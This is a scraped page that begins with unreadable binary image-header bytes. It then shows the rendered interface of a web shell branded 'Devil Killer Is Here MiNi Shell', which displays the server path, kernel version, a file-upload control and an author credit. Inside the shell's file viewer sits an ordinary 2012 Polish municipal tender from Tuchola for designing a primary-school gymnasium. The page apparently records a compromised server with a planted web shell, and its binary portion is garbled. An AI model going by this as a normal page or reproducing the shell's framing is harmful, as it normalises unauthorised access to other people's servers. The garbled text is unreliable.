JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120217/47968-N-2012.html

<p class="kh_header"><b>Tuchola: OPRACOWANIE DOKUMENTACJI PROJEKTOWEJ 
NA BUDOWĘ SALI GIMNASTYCZNEJ PRZY SZKOLE PODSTAWOWEJ NR 5 W TUCHOLI</b><br>
<b>Numer ogłoszenia: 47968 - 2012; data zamieszczenia: 17.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Tuchola , pl. Zamkowy 1, 89-500 Tuchola, woj. kujawsko-pomorskie, tel. 0 52 56 42 500, faks 052 3342138.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.miasto.tuchola.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OPRACOWANIE DOKUMENTACJI PROJEKTOWEJ 
NA BUDOWĘ SALI GIMNASTYCZNEJ PRZY SZKOLE PODSTAWOWEJ NR 5 W TUCHOLI.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie dokumentacji projektowo-kosztorysowej dotyczącej budowy sali gimnastycznej  przy Szkole Podstawowej nr 5 przy ul. Świeckiej 105 w Tucholi wraz z łącznikiem między salą gimnastyczną a istniejącą szkołą i zapleczem sanitarnym - zgodnie z niżej przedstawionymi przesłankami:
- projektowany obiekt należy zblokować z istniejącym budynkiem szkoły od strony północnej i powiązać komunikacyjnie (z poziomem przyziemia), zapewniając wszelkie wymogi bezpieczeństwa (m.in. wejście na salę nie tylko z budynku głównego szkoły, ale również drzwi ewakuacyjne na zewnątrz sali); zblokowanie powinno również polegać na tym, że wejście do szatni i toalet i dalej do sali gimnastycznej, mogłoby się odbywać z obecnego korytarza na parterze szkoły. 
- wysokość sali h około 7 m;
- wielkość płyty boiska 15x25m - na sali gimnastycznej przewiduje się uprawianie sportów: piłka ręczna, koszykówka, dwa ognie, zaprojektować również pełnowymiarowe boisko do siatkówki; 
- trybuny składane;
- podłoga sali elastyczna o powierzchni matowej, bezrefleksowej, antypoślizgowa;
- okna odporne na uderzenia piłki;
- czas pogłosu w sali w granicach 1,5 do 2,3 sek.;
- ogrzewanie: grzejniki do temp. 10oC, powyżej nadmuch;
- zegar, nagłośnienie;
- sprzęt gimnastyczny: 
- drabiny przyścienne,
- tablice do koszykówki montowane na stałe (ściany szczytowe),
- demontowalne słupki z uchwytami do siatkówki,
- bramki do piłki ręcznej;
- zaprojektować zaplecze socjalno-sanitarne: przebieralnie, natryski, ustępy;
- pomieszczenie na przechowywanie sprzętu sportowego;
- pomieszczenie dla trenera lub lekarza z zapleczem socjalnym;
- przebudowa budynku  w zakresie nowego wejścia do budynku szkoły oraz modernizacja sieci ciepłowniczej, elektrycznej, wentylacyjnej, wodnej i kanalizacyjnej - w związku z przebudową;
- nowa lokalizacja wejścia głównego do budynku szkoły od strony ul. Świeckiej przez salę, w której obecnie znajduje się szatnia oddziału przedszkolnego;
- przy nowym wejściu głównym zaprojektować podjazd dla wózków inwalidzkich 
- konieczność modernizacji istniejącej kotłowni gazowej szkoły w celu zapewnienia ogrzewania i ciepłej wody użytkowej zarówno dla szkoły, jak i dla projektowanej sali gimnastycznej; nie przewiduje się osobnej kotłowni przy sali gimnastycznej;
- w związku ze zmianą lokalizacji wejścia głównego do budynku szkoły należy przystosować pomieszczenie socjalne kosztem istniejącej zastępczej sali gimnastycznej;
- zmiana usytuowania toalet (parter): likwidacja starych i zaprojektowanie nowego zaplecza sanitarno-socjalnego przy projektowanym obiekcie sali gimnastycznej - ogólnodostępnego ze szkoły;
- w miejscu starych toalet (parter) zaprojektować pomieszczenie dla poradni logopedycznej;
- zmiana usytuowania toalet (piętro): likwidacja starych, a w ich miejscu zaprojektować powiększenie biblioteki wykorzystując także fragment korytarza;
- nowe toalety na piętrze - w pionie nad nowym zapleczem sanitarno-socjalnym;
- opcjonalnie - w zależności od przedstawionej koncepcji sali gimnastycznej w trakcie prac projektowych - w celu uniknięcia pustej przestrzeni na piętrze zaprojektować część rekreacyjną dla dzieci - np. ogród zimowy;
- uwzględnić w projekcie i kosztorysie, że stalowe elementy konstrukcyjne sali powinny być poddane procesowi cynkowania ogniowego - zgodnie z normą PN-EN ISO 1461;
- uwzględnić w projekcie rozwiązania zapewniające późniejszą ekonomiczną eksploatację obiektu przy zachowaniu optymalnych kosztów budowy; 
- zabrania się używania nazw własnych urządzeń i materiałów w dokumentacji projektowej - należy je opisać przy pomocy parametrów techniczno-użytkowych.
Przedmiot zamówienia obejmuje opracowanie kompleksowej dokumentacji projektowo-kosztorysowej umożliwiającej dokonanie przedmiotowej rozbudowy i dobudowy w zakresie formalno-prawnym oraz techniczno-realizacyjnym, a w szczególności:
- projekt budowlany pełno-branżowy sali gimnastycznej wraz z elementami prac rozbiórkowych i dostosowawczych części istniejącej. 
- budowlane ekspertyzy i oceny techniczne niezbędne do przyjęcia odpowiednich rozwiązań technicznych i projektowych dla przedmiotowego zakresu prac, w oparciu o uzyskane przez Wykonawcę własnym staraniem i kosztem, a niezbędne do projektowania: aktualne mapy sytuacyjno - wysokościowe przeznaczone do celów projektowych, aktualne wypisy i wyrysy z rejestru gruntów i budynków, wyniki badań geotechnicznych oraz wszelkie inne wymagane opracowania, zgody, opinie, uzgodnienia i sprawdzenia.


Zakres dokumentacji obejmuje:
- wystąpienie, w imieniu Zamawiającego, o decyzję o środowiskowych uwarunkowaniach, zgodnie z ustawą z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa  w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. Nr 199 poz. 1227 z późn. zm.) wraz z jej uzyskaniem i uprawomocnieniem, lub o zaświadczenie o braku konieczności uzyskania tej decyzji; 
- wystąpienie, w imieniu Zamawiającego, o decyzję o ustaleniu lokalizacji inwestycji celu publicznego, zgodnie z ustawą z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. Nr 80 poz. 717 z późn. zm.) wraz z jej uzyskaniem i uprawomocnieniem; 
- poniesienie kosztów wymaganych materiałów i uzgodnień, w tym map do celów projektowych;
- uzyskanie niezbędnych opinii, uzgodnień i zatwierdzeń projektów (wraz z poniesieniem kosztów za nie);
- opracowanie projektu budowlanego, zgodnie z Rozporządzeniem Ministra infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. Nr 120, poz.1133, z późniejszymi zmianami);
- opracowanie projektów wykonawczych (będących uzupełnieniem i uszczegółowieniem projektu budowlanego wielobranżowego w zakresie niezbędnym do prawidłowego wykonania wszystkich robót związanych z zadaniem inwestycyjnym) zgodnie z Rozporządzeniem Ministra infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. Nr 120, poz.1133, z późniejszymi zmianami);
- opracowanie projektów technologicznych, zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. Nr 120, poz.1133, z późniejszymi zmianami);
- opracowanie kosztorysów inwestorskich we wszystkich branżach, wraz z zestawieniem zbiorczym kosztów. 
Kosztorysy należy sporządzić metodą szczegółową, zawierające również: szczegółowe przedmiary robót z opisem robót budowlanych w kolejności technologicznej ich wykonania, z podaniem ilości jednostek przedmiarowych robót wynikających z dokumentacji projektowej oraz podstaw do ustalenia cen jednostkowych robót lub nakładów rzeczowych, wykazy materiałów ze szczególnym określeniem ich parametrów technicznych, (ślepe) zbiorcze zestawienie kosztów (tabela elementów scalonych); wykazy maszyn, urządzeń i sprzętu technologicznego, zarówno stałego jak i ruchomego - podstawa prawna: Rozporządzenie Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. nr 130, poz.1389);
- opracowanie przedmiarów dla celów przetargowych dla poszczególnych branżowych projektów wykonawczych. Przedmiary robót należy przygotować zgodnie z wymaganiami Rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z 2004 r. Nr 202, poz. 2072 z późn. zm.).
- opracowanie specyfikacji technicznych wykonania i odbioru robót budowlanych (STWIORB) we wszystkich branżach (zawierających zbiory wymagań w zakresie sposobu wykonywania robót budowlanych, obejmujące w szczególności wymagania w zakresie właściwości materiałów, wymagania dotyczące sposobu wykonania i oceny prawidłowości wykonania poszczególnych robót, określenie zakresu prac, które powinny być ujęte w cenach pozycji przedmiaru robót), zgodnie z wymaganiami Rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z 2004 r. Nr 202, poz. 2072 z późn. zm.);
- przygotowanie kompletnej dokumentacji wraz ze wszystkimi niezbędnymi uzgodnieniami w celu wystąpienia o decyzję pozwolenia na budowę;
- wystąpienie, w imieniu Zamawiającego, o decyzję pozwolenia na budowę zgodnie z Ustawą z dnia 7 lipca 1994. Prawo budowlane (Dz. U. z 2010 r., Nr 243, poz. 1623 z późn. zm.) wraz z jej uzyskaniem i uprawomocnieniem, a ponadto:
- wykonanie projektu zagospodarowania terenu,
- pełnienie nadzoru autorskiego nad budową.


Do podstawowych obowiązków projektanta należeć będzie:
- opracowanie projektu obiektu budowlanego w sposób zgodny z ustaleniami określonymi w decyzji o ustaleniu lokalizacji inwestycji celu publicznego, w decyzji o środowiskowych uwarunkowaniach, o której mowa w art. 71 ust. 1 ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa  w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. Nr 199 poz. 1227 z późn. zm.)  wymaganiami ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2010 r., Nr 243, poz. 1623 z późn. zm.), przepisami i obowiązującymi Polskimi Normami oraz zasadami wiedzy technicznej,
- zapewnienie, w razie potrzeby, udziału w opracowaniu projektu osób posiadających uprawnienia budowlane do projektowania w odpowiedniej specjalności oraz wzajemne skoordynowanie techniczne wykonanych przez te osoby opracowań projektowych, zapewniające uwzględnienie zawartych w przepisach zasad bezpieczeństwa i ochrony zdrowia w procesie budowy, z uwzględnieniem specyfiki projektowanego obiektu budowlanego
- sporządzenie informacji dotyczącej bezpieczeństwa i ochrony zdrowia ze względu na specyfikę projektowanego obiektu budowlanego, uwzględnianej w planie bezpieczeństwa i ochrony zdrowia,
- uzyskanie wymaganych opinii, uzgodnień i sprawdzeń rozwiązań projektowych w zakresie wynikającym z przepisów,
- wyjaśnianie wątpliwości dotyczących projektu i zawartych w nim rozwiązań,
- sprawowanie nadzoru autorskiego w zakresie uzgadniania możliwości wprowadzenia rozwiązań zamiennych w stosunku do przewidzianych w projekcie, zgłoszonych przez kierownika budowy lub inspektora nadzoru inwestorskiego.

Projektant, ma obowiązek sprawdzenia projektu pod względem zgodności z przepisami, w tym techniczno-budowlanymi i obowiązującymi Polskimi Normami, przez osobę posiadającą uprawnienia budowlane do projektowania bez ograniczeń w odpowiedniej specjalności lub rzeczoznawcę budowlanego. 

Wykonawca wybrany w niniejszym postępowaniu będzie zobowiązany składać pisemnie comiesięczny raport o postępie prac nad projektem.

Ponadto Wykonawca wybrany w niniejszym postępowaniu zobowiązany będzie do ciągłej współpracy z Zamawiającym na etapie przygotowywania inwestycji do realizacji oraz w trakcie realizacji niniejszego zadania w zakresie dotyczącym wykonanej dokumentacji projektowej, w szczególności przy jej aktualizacji, w razie konieczności przygotowaniu projektów zamiennych itp. Wraz ze złożeniem kompletu dokumentacji projektant przenosi na rzecz Zamawiającego wszelkie prawa autorskie dotyczące ww. opracowania.
Dokumentacja projektowa zostanie przez Wykonawcę opracowana na papierze w pięciu równorzędnych egzemplarzach dla każdego zakresu zamówienia oraz dodatkowo w jednym kompletnym egzemplarzu umieszczonym na elektronicznym nośniku danych, w plikach edytowalnych i PDF. Kosztorysy zostaną przygotowane w 1 egz. w wersji papierowej oraz w 1 egz. w wersji elektronicznej (wersja edytowalna, ath, PDF).
Wykonawca zobowiązany jest znać wszystkie przepisy wydane przez władze centralne i lokalne oraz inne przepisy, regulaminy i wytyczne, które są w jakikolwiek sposób związane z wykonywanymi opracowaniami projektowymi i będzie w pełni odpowiedzialny za przestrzeganie ich postanowień podczas wykonywania opracowań projektowych.

Wszelkie informacje niezbędne do przygotowania oferty dostępne są do wglądu w siedzibie Zamawiającego oraz udostępnione na stronie internetowej: www.bip.miasto.tuchola.pl.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje, zgodnie z art. 67 ust. 1 pkt. 6 Prawa zamówień publicznych możliwość dokonania zamówień uzupełniających.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 11.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W postępowaniu niniejszym wadium nie jest wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa minimalnych standardów. 
Ocena spełniania warunku zostanie ocenione na podstawie złożonego oświadczenia w formie weryfikacji ww. dokumentu, na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby wykonawcy biorący udział w postępowaniu wykazali wykonanie minimum jednej usługi polegającej na wykonaniu dokumentacji projektowej dotyczącej budowy sali gimnastycznej o kubaturze nie mniejszej niż 6 000 m3 oraz załączenie referencji potwierdzających wykonanie tychże usług. 
Ocena spełniania warunku zostanie ocenione na podstawie złożonego oświadczenia w formie weryfikacji ww. dokumentu, na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa minimalnych standardów. 
Ocena spełniania warunku zostanie ocenione na podstawie złożonego oświadczenia w formie weryfikacji ww. dokumentu, na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa minimalnych standardów. 
Ocena spełniania warunku zostanie ocenione na podstawie złożonego oświadczenia w formie weryfikacji ww. dokumentu, na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa minimalnych standardów. 
Ocena spełniania warunku zostanie ocenione na podstawie złożonego oświadczenia w formie weryfikacji ww. dokumentu, na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Oświadczenia, że wykonawca spełnia warunki określone w SIWZ wynikające i określone w art. 22 ust. 1 ustawy - załącznik nr 2 do SIWZ;
2) Wypełniony formularz oferty - załącznik nr 1 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia zmian do zawartej umowy w następujących sytuacjach:
- zmiana osób wykonujących usługę, przy pomocy których wykonawca realizuje przedmiot umowy, na inne legitymujące się co najmniej równoważnymi uprawnieniami i kwalifikacjami, o których mowa w ustawie Prawo budowlane lub innych ustawach, a także w SIWZ,
- zmiana sposobu wykonania usługi,
- zmiana terminu wykonania usługi,
- rezygnacja z wykonania części usługi wraz z określeniem maksymalnej wielkości tej rezygnacji, w takim przypadku wynagrodzenie przysługujące wykonawcy zostanie pomniejszone, przy czym zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami,
- zmiana warunków gwarancji jakości, jeżeli wystąpią uzasadnione przypadki nieprzewidzianych warunków realizacji przedmiotu umowy.
- jeżeli wystąpi konieczność wprowadzenia zmian w dokumentacji projektowej czego nie można było przewidzieć w chwili zawarcia umowy 
- jeżeli zmianie ulegnie urzędowa stawka VAT,
- na skutek siły wyższej zajdzie konieczność zmiany terminu wykonania zamówienia.

Wykonawca nie będzie uprawniony do żadnego przedłużenia terminu wykonania umowy i zwiększenia wynagrodzenia, jeżeli zmiana jest wymuszona uchybieniem czy naruszeniem umowy przez Wykonawcę; w takim przypadku koszty dodatkowe związane z takimi zmianami ponosi Wykonawca.

Dokonanie zmian, o których mowa wyżej wymaga podpisania aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.miasto.tuchola.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Tucholi
plac Zamkowy 1, 89-500 Tuchola.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.03.2012 godzina 10:00, miejsce: Urząd Miejski w Tucholi
plac Zamkowy 1, 89-500 Tuchola.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com